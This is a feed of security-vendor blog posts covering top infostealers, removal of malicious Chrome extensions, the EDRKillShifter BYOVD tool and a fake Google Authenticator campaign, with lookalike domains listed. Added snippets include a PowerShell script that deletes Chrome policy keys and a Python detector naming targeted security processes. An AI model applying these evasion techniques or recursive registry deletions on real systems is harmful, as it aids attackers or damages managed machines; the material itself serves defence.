Threats – Gridinsoft Blog (https://gridinsoft.com/blogs)
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

Top 5 Infostealer Malware of 2025: The Silent Data Snatchers
https://gridinsoft.com/blogs/infostealer-malware-top/
Mon, 28 Apr 2025 13:16:29 +0000
Remember when we used to worry about viruses that just crashed your computer? Those were simpler times. In 2025, cybercriminals prefer to steal your data rather than destroy it. Welcome to the golden age of infostealer malware – the digital pickpockets that empty your accounts while you’re busy scrolling through cat videos.

The data tells a striking story: while media headlines scream about ransomware attacks, infostealers quietly dominate the threat landscape, accounting for nearly a quarter of all cybersecurity incidents. This silent majority operates without flashy ransom notes or system lockdowns, making them even more dangerous. As the defensive focus shifts to stopping ransomware, these stealthy data thieves slip through the cracks, reaping massive rewards with far less attention. The trend is clear – attackers have realized that stealing your data offers better ROI than holding it hostage.

What Even Is an Infostealer?

Infostealers are exactly what they sound like – malware designed to quietly extract sensitive information from your device. They target passwords, credit card details, cryptocurrency wallets, browser cookies, and pretty much anything that could be valuable on the digital black market. Think of them as the cybercriminal’s Swiss Army knife – versatile, reliable, and exceedingly popular.

Unlike ransomware’s dramatic hostage-taking approach, infostealers prefer to work in the shadows. They slip in, grab what they want, and often leave without you noticing anything’s wrong. By the time you realize your accounts have been compromised, your data is already being sold on dark web marketplaces or used for follow-up attacks.

Why Infostealers Are Booming in 2025

According to IBM’s X-Force Threat Intelligence Index 2025, credential harvesting now occurs in 29% of all cybersecurity incidents. That’s a massive slice of the cybercrime pie. The Verizon 2025 DBIR found that 54% of ransomware victims had their domains appear in infostealer logs first – meaning these stealers often serve as the appetizer before the main ransomware course.

Cryptocurrency remains a major driver behind infostealer popularity. With traditional banking fraud becoming harder to pull off, crypto wallets represent a softer target with potentially massive payoffs. Plus, the rise of BYOD (Bring Your Own Device) policies has created a perfect storm – personal devices often have both work and personal credentials, making them information goldmines.

The Fab Five: 2025’s Most Notorious Infostealers

Not all infostealers are created equal. Some have risen to the top through a combination of advanced features, reliability, and aggressive marketing on cybercrime forums. Here’s the current leaderboard of data thieves keeping security professionals up at night.

1. Lumma Stealer (LummaC2)

Lumma has climbed to the #1 spot in 2025, a remarkable rise for malware first detected in late 2022. Its success comes from its stealthy approach to data exfiltration – sending information in small fragments to avoid triggering security alerts. The developers offer tiered pricing plans ranging from $250 to $1,000, with premium features like network sniffing functionality reserved for big spenders.

What makes Lumma particularly dangerous is its comprehensive targeting. It captures browser data, cryptocurrency wallets, two-factor authentication apps, email clients, and even Telegram sessions. For cybercriminals willing to shell out $20,000, Lumma’s developers will even provide source code access and reselling rights – talk about customer service.

2. StealC Stealer

StealC has rocketed to second place this year, proving that sometimes the new kid on the block can outshine the veterans. Released in early 2023, StealC combines the best features of other top infostealers with an aggressive development cycle – releasing new features weekly. Unlike many competitors, StealC offers free testing periods and unusually responsive customer support on darknet forums.

Security researchers at Trac Labs noted StealC’s botched v2 release in 2024, but the developers quickly recovered with v2.1, which improved its ability to evade detection while expanding its targeting capabilities. Its growing market share makes it clear that stumbles haven’t impeded its rise to prominence.

3. RedLine Stealer

RedLine has held onto a top-three position since 2020, demonstrating impressive staying power in a fickle malware market. Written in C#, this veteran infostealer excels at grabbing credentials from over 60 browsers, VPN configs, cryptocurrency wallets, and FTP clients. Its relatively user-friendly control panel and reasonable pricing (starting around $150-$200) have maintained its popularity among less technical cybercriminals.

Despite being one of the older contenders, FortiGuard Labs reports that RedLine continues to receive regular updates. Recent versions have improved its ability to bypass Windows Defender and added capabilities to steal gaming accounts – because apparently, your Steam inventory is now worth stealing too.

4. Raccoon Stealer

If infostealers had an old guard, Raccoon would be part of it. Around since 2019, this digital veteran has somehow managed to stay relevant in the ever-changing malware landscape. While newer threats come and go, Raccoon keeps adapting and evolving – kind of like that one friend who somehow stays cool despite getting older.

What’s interesting about Raccoon isn’t just its staying power but how it’s run like an actual business. The developers offer round-the-clock customer support through Telegram (better service than my internet provider, honestly) and roll out updates more consistently than most legitimate software companies. They’ve recently added Telegram Desktop theft capabilities and expanded their crypto wallet targeting – because apparently stealing your Bitcoin wasn’t enough, now they want your obscure altcoins too.

At $275 monthly, it’s not exactly budget-friendly for aspiring cybercriminals, but you get what you pay for. Raccoon has earned its reputation for reliability in the underground markets. Hunt.io researchers recently caught it using fileless infection techniques – basically operating in your computer’s memory without leaving obvious traces on disk. It’s like a burglar who not only doesn’t break your windows but somehow manages to avoid leaving footprints on your carpet.

5. Vidar Stealer

Vidar is what happens when malware developers embrace the “build-your-own-adventure” model. Born as an offshoot of another stealer called Arkei back in 2018, Vidar gives its criminal users a modular, mix-and-match approach to data theft. Want to steal passwords but not cookies? No problem. Need crypto wallets but not browser history? They’ve got you covered.

What makes security pros lose sleep over Vidar is its chameleon-like ability to disappear after doing its dirty work. Once it’s grabbed what it came for, Vidar can completely remove itself from your system – like a thief who not only steals your valuables but also washes the dishes and vacuums before leaving, just to make you question if you’ve been robbed at all.

The U.S. Department of Health and Human Services didn’t mince words when they called Vidar “exceptionally potent.” It’s frequently deployed alongside ransomware like STOP/Djvu in tag-team attacks. The latest versions have even figured out how to steal MFA seed values – those supposedly “unbreakable” second factors protecting your accounts. It’s basically telling your two-factor authentication, “That’s cute, hold my beer.”

Data Targeted by Information Stealers

[Chart: Data Targeted by Information Stealers (2025). Series: Lumma, RedLine, StealC, Raccoon. Categories: Browser Data, Crypto Wallets, System Information, App Credentials. Axis: 0% to 75%.]

Source: GridinSoft Research Lab analysis, 2025

The visualization reveals a disturbing truth: modern infostealers don’t just target one type of data—they’re designed for comprehensive digital identity theft. Lumma leads the pack in browser data collection, which shouldn’t surprise anyone considering we practically live in our browsers. Meanwhile, the crypto wallet targeting reflects attackers’ preference for assets that are both valuable and irreversible once stolen. The pattern is clear: these tools are becoming increasingly sophisticated in their ability to extract everything from your digital life worth stealing.

Real-World Impact: When Infostealers Strike

The damage from infostealers extends far beyond individual victims. Major breaches in early 2025 demonstrate their growing threat to organizations of all sizes. Samsung Tickets suffered a massive leak in March when a hacker exploited credentials stolen by an infostealer infection from 2021, exposing 270,000 customer records.

Even more alarming, the HELLCAT ransomware group has made infostealers central to their strategy, successfully breaching Jaguar Land Rover, Telefónica, and several other major companies using stolen credentials from infostealer logs. These incidents highlight how a single compromised device can lead to enterprise-wide breaches months or even years later.

How to Keep Your Data From Being Stolen

Protecting yourself against infostealers doesn’t require a cybersecurity degree. Focus on these essentials:

  • Update everything – Patch your system and apps promptly
  • Use a password manager – Create unique passwords for every site
  • Enable MFA everywhere possible – Preferably using authenticator apps
  • Avoid pirated software – That “free” Photoshop is a trojan horse
  • Run security software – Choose solutions that detect behavioral anomalies

For more detailed information, check out our comprehensive guide on how to detect, remove, and prevent infostealer infections.

Infostealer Comparison: The 2025 Threat Landscape

Feature | Lumma | StealC | RedLine | Raccoon | Vidar
First Appeared | 2022 | 2023 | 2020 | 2019 | 2018
Pricing Model | $250-$1,000; source code: $20,000 | $150-$250; free trial periods | $150-$200; flat fee | $275/month; subscription | $200-$500; custom builds
Primary Targets | Browsers, wallets, 2FA apps, email clients, Telegram | Browser data, VPN credentials, passwords | 60+ browsers, VPN configs, crypto wallets, FTP clients | Wallets, Telegram data, browser credentials | Customizable targeting based on attacker needs
Unique Features | Fragment-based exfiltration that avoids detection | Aggressive weekly update cycle, responsive support | User-friendly control panel, wide-ranging browser support | Fileless infection techniques, 24/7 Telegram support | Self-destruction capability, MFA seed value theft
Distribution | Phishing, malvertising, cracked software | Spam email, fake downloads, compromised sites | Forums, torrents, malspam | Malicious ads, cracked software | Phishing, bundled with ransomware
Detection Difficulty | Very High | High | Medium | High | Very High
Market Share Trend | ↑ Rapidly growing | ↑ Growing | → Stable | → Stable | ↑ Growing
Common Pairings | Often precedes ransomware | Used with remote access trojans | Cryptocurrency miners | Additional backdoors | STOP/Djvu ransomware

The Bottom Line

Here’s the uncomfortable truth that cybersecurity professionals don’t always articulate clearly: in 2025, it’s not a question of if your credentials will be targeted, but when. Infostealers have evolved from crude data-grabbing tools into digital espionage platforms that operate with unsettling efficiency. They’re the silent assassins of the cybersecurity world – no flashy techniques, no dramatic demands, just quiet theft that often goes unnoticed until the damage is done.

The reality is that cybercriminals have realized a fundamental truth about human behavior: we’re creatures of habit and convenience, routinely sacrificing security for simplicity. Password reuse, postponed updates, and clicking without thinking aren’t just bad habits – they’re open invitations to these digital thieves. The brutal economics also can’t be ignored: why would criminals bother with complex ransomware operations when they can extract cryptocurrency wallet contents directly, without the messy negotiations?

The cybersecurity landscape is constantly evolving, but one principle remains stubbornly consistent – attackers will always follow the path of least resistance to valuable data. By implementing even some of the protection measures outlined above, you’re essentially making yourself a harder target. In the digital wilderness, you don’t need to outrun the bear – you just need to outrun the other hikers. Make your digital presence secure enough that attackers look for easier pickings elsewhere, and you’ve won half the battle.

Want to stay protected without a computer science degree? Get Gridinsoft Anti-Malware today and let us handle the technical heavy lifting while you get back to whatever you were doing before you started worrying about digital pickpockets.

The post Top 5 Infostealer Malware of 2025: The Silent Data Snatchers appeared first on Gridinsoft Blog.

JsTimer Extension Virus – Easy Removal Instructions
https://gridinsoft.com/blogs/jstimer-extension-virus/
Fri, 06 Sep 2024 17:11:12 +0000
JsTimer is a malicious browser extension detected in various browsers, predominantly targeting users through dubious websites. This extension engages in peculiar behavior by blocking access to the Chrome Web Store, which, although seemingly trivial at first, raises significant concerns when paired with other similarly distributed extensions.

Malicious browser extensions are not a novel threat; however, the year 2024 marks a notable resurgence in their use as effective tools in cybercrime arsenals. JsTimer, like the Funny Tool Redirect extension, is notorious for redirecting users during web browsing sessions and potentially harvesting extensive personal information, thereby posing a severe threat to user privacy.

Exploring the JsTimer Extension Virus

JsTimer is designed for Chrome and Chromium-based browsers and is categorized as a harmful plugin. On the surface, its actions might appear benign as it merely redirects users to Google Search’s main page anytime they attempt to access the Chrome Web Store. The mechanism behind this is straightforward yet invasive: JsTimer monitors and intercepts attempts to navigate to chromewebstore.google.com. This behavior mirrors the functionalities of traditional browser hijackers, making it a subtle yet significant threat.

JsTimer Extension

Like many other malicious extensions, JsTimer exploits the “Managed by your organization” feature found in Chromium browsers. Typically, this setting is used by organizations to control browser setup and prevent users from modifying extensions and settings. However, in this scenario, cybercriminals manipulate this feature to thwart manual removal efforts by users.

Varied Effects of the JsTimer Malicious Plugin

The behavior of the JsTimer browser extension varies based on the IP address of the host computer. Under normal conditions, if the system’s IP address is from an area on the “operational” list, JsTimer engages in its primary malicious activities. Conversely, if the system is located in a “banned” region, the extension switches to a less aggressive mode.

Primarily, JsTimer’s main function is to redirect user searches from Google to alternative search engines. In its latest version, it redirects queries to findflarex.com, which then sends users to boyu.com.tr. Findflarex.com acts as an intermediary that not only captures the initial search request but also injects additional search tokens. Boyu.com.tr, a pseudo-search engine, uses these tokens to display an overwhelming number of advertisements. This redirection and ad-loading process is integral to the monetization strategy behind the malicious scheme.

Redirect route

Another facet of this scheme involves blocking access to the Chrome Web Store. Understandably, users frustrated by an extension that commandeers their search queries would naturally head to the Web Store to identify the offending extension, leave a critical review, and report the abuse. However, what this plugin cunningly does is redirect any attempts to visit chromewebstore.google.com back to the main Google search page. While this might seem minor initially, when combined with other malicious behaviors, it exacerbates the issues significantly.

If JsTimer detects that the system’s location is in what it deems the “wrong” region, it will restrict access to the Chrome Web Store. This tactic might go unnoticed by users who infrequently visit the store, yet it serves as a protective measure for the extension and any others that might be involved in the scheme.

Spreading Ways

Most of the time, junk extensions like JsTimer get into a browser through a fraudulent website the user is redirected to. This often happens while interacting with questionable sites, typically ones hosting pirated content. On the page, the user sees an offer to install “the recommended extension” (the wording varies from case to case). The crooks count on people clicking through the pages in a rush to get to the content they want. And that is it – after a single session on such a website, a user may end up with a handful of malicious extensions.

Another common situation that leads to the “install the extension” page is active adware on the system. Aside from injecting ads into every page the user visits, it may also open additional tabs with more ads or other questionable content. And since malware actors often work with each other, it is no surprise to see adware opening a malicious extension’s installation page.

The entire spreading campaign of malicious extensions rests on two things: users’ haste and their lack of awareness of the potential pitfalls. Combined, these can bring in pretty much any malware, from spyware and backdoors to ransomware. Stay alert and follow cybersecurity news to keep up with cybercriminals’ new tactics!

How to Remove JsTimer Extension?

It is possible to get rid of JsTimer both manually and automatically. I recommend sticking to the automated method for the reasons described above: the source malware, as well as any other junk that got into the system the same way, will remain even after you remove the extension. For this purpose, I recommend GridinSoft Anti-Malware.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are many detections. Do not interrupt it, and you will get your system as clean as new.

Removal finished

Manual removal method

To get rid of the JsTimer extension manually, you first need to remove the “Managed by your organization” lock. This trick stems from changes to the browser’s registry keys, which hold such policy-level configuration, so removing that registry key does the job. Open Registry Editor by pressing Win+R, typing “regedit” into the window that appears, and pressing Enter. Then paste the registry address below into the address bar:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome

Delete this registry key: right-click it and choose Delete. That does the job – from then on, nothing will stop you from removing the extension through the Extensions tab. On its next start, Chrome will restore its registry key, but without the malicious change.

Delete registry key

You may also find guides online that suggest changing Group Policy settings. I will not cover that here, as it is not possible on non-Pro Windows editions. That is yet another reason why removal with anti-malware software is preferable.

The post JsTimer Extension Virus – Easy Removal Instructions appeared first on Gridinsoft Blog.

Funny Tool Redirect Extension Virus – Easy Removal Instructions
https://gridinsoft.com/blogs/funny-tool-redirect-extension-removal/
Wed, 04 Sep 2024 11:59:53 +0000
Funny Tool Redirect is a malicious browser extension that you may find installed in your browser. It spreads through dodgy websites and does a rather unusual kind of mischief: blocking access to the Chrome Web Store. While not a big deal at first glance, its unwanted appearance alongside other extensions (like JsTimer) that spread the same way makes the situation concerning.

Malicious browser extensions are far from a new type of threat. Nonetheless, 2024 seems to be the year of their comeback as a widespread and rather potent cybercrime tool. Besides the unwanted redirects they are mainly known for, such extensions may also collect a lot of user information, which makes them a much more serious threat, primarily to privacy.

What is a Funny Tool Redirect Extension Virus?

Funny Tool Redirect is a browser extension for Chrome and Chromium browsers that falls into a category of malicious plugins. Its visible behavior is not too threatening on the surface: all it does is redirect the user to the main page of Google Search should they try opening the Chrome Web Store. The way it works is pretty simple: it can track the URLs that the browser tries to open and simply intercepts every single call to the chromewebstore.google.com website. That functionality is identical to what browser hijackers can do.

Funny Tool Redirect page
Page of Funny Tool Redirect in the Chrome Web Store

Like all other extension viruses, Funny Tool abuses the “Managed by your organization” feature of Chromium browsers. As the name suggests, this mode normally means that a company has set the browser up and protects the extensions and other settings from user modification. In this case, however, the con artists behind the extension take advantage of the feature to prevent manual removal attempts.

Effects of a Malicious Plugin

The Funny Tool Redirect browser extension appears to behave differently depending on the IP address of the computer. It works in a rather simple manner: if the system is in a region on the “operational” list, it proceeds with its mainstream behavior. However, should the extension detect an IP from one of the “banned” countries, it switches to a much less harmful mode.

So, the main activity of Funny Tool Redirect is redirecting the user from any Google search request to a different search engine. In its current iteration, it routes everything to findflarex.com, which further throws the user to boyu.com.tr. The former is an intermediary website that, aside from intercepting the original request, also injects additional search tokens. The latter, in turn, is a wannabe search engine that uses those search tokens to display huge amounts of ads. All this forms the monetization model of the malicious scheme.

Redirect route

Another part of this scheme is blocking access to the Chrome Web Store. You see, people get disgruntled with a thing that hijacks their search queries. The obvious reaction is to find the mischievous extension in the Web Store, leave a bitter comment, and report abuse to the administration. What the plugin does in this case is redirect any request to chromewebstore.google.com to the main Google page. This may not look like much at first glance, but in combination with the other malicious actions it causes a lot of problems.

When Funny Tool Redirect sees the “wrong” location of the system, it only blocks the user out of the Chrome Web Store. Such a tactic may remain unnoticed if the user does not visit the store often, but it may still be useful for other malicious extensions.

Spreading Ways

Most of the time, junk extensions like Funny Tool Redirect get onto a user’s device through a fraudulent website the user is redirected to. This often happens while interacting with questionable sites, typically ones hosting pirated content. On the page, the user sees an offer to install “the recommended extension” (the wording varies from case to case). The crooks count on people clicking through the pages in a rush to get to the content they want. And that is it – after a single session on such a website, a user may end up with a handful of malicious extensions.

Another common situation that leads to the “install the extension” page is active adware on the system. Aside from injecting ads into every page the user visits, it may also open additional tabs with more ads or other questionable content. And since malware actors often work with each other, it is no surprise to see adware opening a malicious extension’s installation page.

The entire spreading campaign of malicious extensions rests on two things: users’ haste and their lack of awareness of the potential pitfalls. Combined, these can bring in pretty much any malware, from spyware and backdoors to ransomware. Stay alert and follow cybersecurity news to keep up with cybercriminals’ new tactics!

How to Remove Funny Tool Redirect Extension?

It is possible to get rid of Funny Tool Redirect both manually and automatically. I recommend sticking to the automated method for the reasons described above: the source malware, as well as any other junk that got into the system the same way, will remain even after you remove the extension. For this purpose, I recommend GridinSoft Anti-Malware.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are many detections. Do not interrupt it, and you will get your system as clean as new.

Removal finished

Manual removal method

To get rid of the Funny Tool Redirect extension manually, you first need to remove the “Managed by your organization” lock. This trick stems from changes to the browser’s registry keys, which hold such policy-level configuration, so removing that registry key does the job. Open Registry Editor by pressing Win+R, typing “regedit” into the window that appears, and pressing Enter. Then paste the registry address below into the address bar:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome

Delete this registry key: right-click it and choose Delete. That does the job – from then on, nothing will stop you from removing the extension through the Extensions tab. On its next start, Chrome will restore its registry key, but without the malicious change.

Delete registry key
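As an added example for the manual removal steps in both the JsTimer and the Funny Tool Redirect guides above (this is not code from the posts), the script below lists what the Chrome policy key contains, such as forced extension entries and overridden search settings, before deleting it the way the guide instructs. Beyond the HKLM path named in the post, it also checks the per-user HKCU copy of the same path, which Chrome reads as well; the policy names used (ExtensionInstallForcelist, URLBlocklist) are real Chrome policies, not taken from the posts.

```powershell
# Added example, not from the Gridinsoft posts: inspect the Chrome policy key that the
# manual-removal steps tell you to delete, so you can see what the hijacker wrote there
# (forced extensions, overridden search/home page) before removing it.
# Run from an elevated PowerShell prompt; HKLM is machine-wide.
# Chrome reads policies from HKLM and also from the per-user HKCU mirror of the same
# path (an addition to the post, which only names HKLM), so both roots are checked.

$policyRoots = @(
    'HKLM:\SOFTWARE\Policies\Google\Chrome',
    'HKCU:\SOFTWARE\Policies\Google\Chrome'
)

function Show-ChromePolicyKey {
    param([string]$Key)

    if (-not (Test-Path $Key)) {
        Write-Host "$Key : not present"
        return
    }

    Write-Host "==== $Key ===="

    # Plain policy values set directly on the key (e.g. HomepageLocation,
    # DefaultSearchProviderSearchURL). The PS* properties are PowerShell metadata.
    $values = Get-ItemProperty -Path $Key
    $values.PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' } |
        ForEach-Object { Write-Host ("  {0} = {1}" -f $_.Name, $_.Value) }

    # ExtensionInstallForcelist is the Chrome policy that force-installs extensions the
    # user cannot remove; each value has the form "<extension id>;<update URL>".
    $forceList = Join-Path $Key 'ExtensionInstallForcelist'
    if (Test-Path $forceList) {
        Write-Host "  Force-installed extensions:"
        (Get-ItemProperty -Path $forceList).PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' } |
            ForEach-Object {
                $id, $updateUrl = $_.Value -split ';', 2
                Write-Host ("    id={0} update={1}" -f $id, $updateUrl)
            }
    }

    # Any other policy subkeys (URLBlocklist, ExtensionInstallBlocklist, ...)
    Get-ChildItem -Path $Key |
        Where-Object { $_.PSChildName -ne 'ExtensionInstallForcelist' } |
        ForEach-Object { Write-Host ("  subkey: {0}" -f $_.PSChildName) }
}

foreach ($root in $policyRoots) { Show-ChromePolicyKey -Key $root }

# The removal step from the post. -Confirm asks before each deletion; on a company-managed
# PC this key also carries legitimate IT policies, so review the listing above first.
foreach ($root in $policyRoots) {
    if (Test-Path $root) { Remove-Item -Path $root -Recurse -Confirm }
}
```

After deleting the key, restart Chrome and the “Managed by your organization” notice should be gone, at which point the extension can be removed from the Extensions tab as the guide describes.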

You may also find guides online that suggest changing Group Policy settings. I will not cover that here, as it is not possible on non-Pro Windows editions. That is yet another reason why removal with anti-malware software is preferable.

The post Funny Tool Redirect Extension Virus – Easy Removal Instructions appeared first on Gridinsoft Blog.

EDRKillShifter Malware: New EDR Killer Tool in Ransomware Actors’ Toolkit
https://gridinsoft.com/blogs/edrkillshifter-tool/
Thu, 15 Aug 2024 14:18:41 +0000
Recent research uncovers a new anti-EDR utility in the arsenal of malware actors, nicknamed EDRKillShifter. Its main known user at the moment is the RansomHub ransomware gang, though other threat actors are likely to adopt this tool, as similar utilities are immensely popular among cybercriminals nowadays.

EDRKillShifter Used in Ransomware Attacks

The research team at Sophos did a tremendous job analyzing the new toolkit. Being an element of targeted ransomware attacks, EDRKillShifter employs many detection evasion techniques, as it is meant to be used among the first steps of an attack. It is also worth noting that the tool is written in Golang, which appears to be a new trend among malware creators. This helps with detection evasion, too, thanks to the obfuscation utilities available for that language.

EDRKillShifter scheme

One of the notable users of this anti-EDR tool is the RansomHub ransomware gang. It appeared in late February 2024 and quickly gained traction, attacking companies in Europe and the US; it is now among the most active ransomware groups, claiming attacks on over 80 companies. Similar tools are used by other groups as well, for instance AuKill, which has been seen in LockBit ransomware attacks.

EDRKillShifter executes in three stages. The first requires direct interaction from the adversary: the operator must supply the correct password when launching the malware from the command line. The remaining steps run automatically: the toolkit decrypts its embedded resources and loads the next stage into memory, after which the main part of the attack begins.

The key trick this toolkit relies on is bring-your-own-vulnerable-driver (BYOVD): it loads a legitimate, signed driver that has a known vulnerability, and that driver does the actual work of disabling EDR. Because the driver carries a valid signature and is recognized as benign, it loads under the nose of a still-running security solution. Through the vulnerable driver, EDRKillShifter then methodically walks the running processes and terminates the ones that match a hardcoded list of security products.

How effective is EDRKillShifter?

Anti-EDR tools show a rather high success rate in cyberattacks, and their growing popularity among threat actors confirms this. Disabling the security tool effectively frees adversaries to do whatever they want next. EDRKillShifter itself is also rather hard to detect, due to the obfuscation and BYOVD tactics it uses. Researchers also note that the list of EDR solutions the toolkit targets is easy to expand: since it is a hardcoded list, the operators simply add new entries or replace old ones.

Fair enough, it is not the final payload, but it is what makes deploying one possible. Security analysts agree that such attack techniques will keep expanding, with even more tricks and capabilities. Fortunately, BYOVD is not a new tactic and security vendors already have ways to detect its abuse: Microsoft ships a vulnerable driver blocklist that Windows enforces when memory integrity (HVCI) is enabled, and a signed driver loading from an unusual path followed by a burst of security-product process terminations is a telltale pattern in endpoint telemetry.
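To make the detection side concrete, here is an added example (not from the Sophos research or this post) in Python that correlates two pieces of endpoint telemetry: a driver load that is either on a vulnerable-driver blocklist or comes from an unusual path, followed within a short window by several security-product processes dying. The events, hashes, paths and agent names are constructed placeholders modelled on Sysmon Event IDs 6 and 5, not indicators from EDRKillShifter.

```python
"""Correlate a suspicious driver load with a burst of security-product
process terminations, the observable footprint of a BYOVD "EDR killer".

Added example: events are modelled on Sysmon Event ID 6 (driver loaded)
and Event ID 5 (process terminated). Hashes, paths and agent names are
constructed placeholders, not indicators from any real sample.
"""
from __future__ import annotations

from datetime import datetime, timedelta
from pathlib import PureWindowsPath

VULN_HASH = "11" * 32    # placeholder SHA256 standing in for a blocklisted driver
BENIGN_HASH = "aa" * 32  # placeholder SHA256 of a normal Windows driver

# Stand-in for a real vulnerable-driver blocklist (e.g. the hashes shipped in
# Microsoft's driver blocklist policy).
KNOWN_VULNERABLE_SHA256 = {VULN_HASH}

# Process names an EDR killer would target. MsMpEng.exe is Defender's engine;
# the other two are hypothetical vendor agents.
SECURITY_PROCESSES = {"msmpeng.exe", "edr_agent.exe", "edr_sensor.exe"}

# A signed driver loading from outside this directory deserves a second look
# even if its hash is not on the blocklist yet.
TRUSTED_DRIVER_DIR = PureWindowsPath(r"C:\Windows\System32\drivers")

# Constructed timeline: a normal driver load and a routine agent restart, then
# a driver dropped to a user-writable path followed by three agents dying.
EVENTS = [
    {"ts": "2024-08-15T14:00:01", "id": 6, "ImageLoaded": r"C:\Windows\System32\drivers\netio.sys",
     "Hashes": f"SHA1=ab,SHA256={BENIGN_HASH},IMPHASH=cd", "SignatureStatus": "Valid"},
    {"ts": "2024-08-15T14:00:30", "id": 5, "Image": r"C:\Program Files\Vendor\edr_agent.exe"},
    {"ts": "2024-08-15T14:05:10", "id": 6, "ImageLoaded": r"C:\Users\Public\tmp\abcd.sys",
     "Hashes": f"SHA256={VULN_HASH}", "SignatureStatus": "Valid"},
    {"ts": "2024-08-15T14:05:11", "id": 5, "Image": r"C:\Program Files\Vendor\edr_agent.exe"},
    {"ts": "2024-08-15T14:05:11", "id": 5, "Image": r"C:\Program Files\Vendor\edr_sensor.exe"},
    {"ts": "2024-08-15T14:05:12", "id": 5,
     "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe"},
    {"ts": "2024-08-15T14:05:13", "id": 5, "Image": r"C:\Windows\System32\notepad.exe"},
]


def sha256_of(hashes_field: str) -> str | None:
    """Sysmon writes 'SHA1=...,SHA256=...,IMPHASH=...'; pull out the SHA256."""
    for part in hashes_field.split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "SHA256":
            return value.strip().lower()
    return None


def driver_suspicion(event: dict) -> str | None:
    """Reason a driver-load event deserves correlation, or None if it looks normal."""
    if sha256_of(event["Hashes"]) in KNOWN_VULNERABLE_SHA256:
        return "hash on vulnerable-driver blocklist"
    if event.get("SignatureStatus", "").lower() != "valid":
        return "driver signature not valid"
    if not PureWindowsPath(event["ImageLoaded"]).is_relative_to(TRUSTED_DRIVER_DIR):
        return "signed driver loaded from outside the drivers directory"
    return None


def find_edr_kills(events: list[dict], window_s: int = 120, min_kills: int = 2) -> list[dict]:
    """Alert when a suspicious driver load is followed, within window_s seconds,
    by terminations of at least min_kills distinct security-product processes."""
    timeline = sorted(((datetime.fromisoformat(e["ts"]), e) for e in events), key=lambda p: p[0])
    alerts = []
    for t0, ev in timeline:
        if ev["id"] != 6:
            continue
        reason = driver_suspicion(ev)
        if reason is None:
            continue
        deadline = t0 + timedelta(seconds=window_s)
        killed = {
            PureWindowsPath(e["Image"]).name.lower()
            for t, e in timeline
            if e["id"] == 5 and t0 <= t <= deadline
            and PureWindowsPath(e["Image"]).name.lower() in SECURITY_PROCESSES
        }
        if len(killed) >= min_kills:
            alerts.append({"driver": ev["ImageLoaded"], "reason": reason, "killed": sorted(killed)})
    return alerts


if __name__ == "__main__":
    for alert in find_edr_kills(EVENTS):
        print(alert)
```

The point of keying the rule on the driver load rather than on who killed the processes is that a kernel driver terminates processes without leaving a user-mode ProcessAccess event, so the only reliable anchor is the load itself plus the effect that follows it.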

Darknet Infrastructure of EDR Killer Tools

One more noteworthy thing about EDRKillShifter is the infrastructure built around this and similar toolkits. Obfuscation services and loaders for malware payloads have always been a profitable Darknet business, and that applies to this anti-EDR tool as well: the loader that executes the first attack stage appears to be made by a different threat actor, and the obfuscation is likely done by a third party too.

From a certain point of view, this may look like an unnecessary complication and an extra cost for the attack. On the other hand, assembling the toolchain from components made by different cybercriminals makes it harder to detect and to attribute, and that is worth far more than the fee the ransomware actors pay for these services.

Fake Google Authenticator Abuses Google Ads, Spreads Malware https://gridinsoft.com/blogs/fake-google-authenticator-google-ads/ https://gridinsoft.com/blogs/fake-google-authenticator-google-ads/#respond Wed, 31 Jul 2024 19:57:57 +0000 https://gridinsoft.com/blogs/?p=26035 Cybercriminals promote a fake Google Authenticator page through ads in Google Search. According to the report, they use a tricky scheme to hide the fraudulent domain and make the ad contain a genuine URL. The resulting page, which looks exactly like the original Google Authenticator one, downloads a malicious file. Fake Google Authenticator Downloading Page […]

The post Fake Google Authenticator Abuses Google Ads, Spreads Malware appeared first on Gridinsoft Blog.

Cybercriminals are promoting a fake Google Authenticator page through ads in Google Search. According to the researchers' report, they use a trick that hides the fraudulent domain and makes the ad display a genuine-looking URL. The resulting page, which looks exactly like the original Google Authenticator one, serves a malicious file.

Fake Google Authenticator Downloading Page Promoted on Google Ads

On July 30, 2024, analysts noticed an advertisement on Google Search leading to a website that mimics the legitimate Google Authenticator download page. This is not the first abuse of Google Ads' imperfect moderation, but this time the fraudsters dare to impersonate Google itself. The ad uses a trick that makes its displayed link look genuine; clicking it, however, triggers a chain of redirects that lands the victim on the chromeweb-authenticators.com website.

Fake Google Authenticator download site

List of domains used in this scam

  • gg2024.info
  • gg2024.com
  • authenticcator-descktop.com
  • authentificatorgoogle.com
  • authentificator-gogle.com
  • athentificator-gogle.com
  • updater-pro.com
  • authentificatorgogle.com
  • authenticattor-googl.com
  • chromstore-authentificator.com
  • authentificcatorgoolgle.com
  • authenticator-google.com
  • authentificator-googl.com
  • authentficatorgoogle.com

The website itself copies the style of the original Authenticator page and even contains links to genuine Google blog posts. What is different is the presence of two tempting “Download” buttons. Google has never offered a desktop version of its MFA app, so a download button is the tell, and that is where the key part of the scheme happens.

Google Authentication fake installer

Clicking either “Download” button pulls the Authenticator.exe file from a GitHub repository. Hosting the payload there helps the operators delay detection: GitHub is widely trusted, even though it has served as malware storage in a number of campaigns. An unaware victim confirms the download and runs the fake Authenticator, which launches the payload.
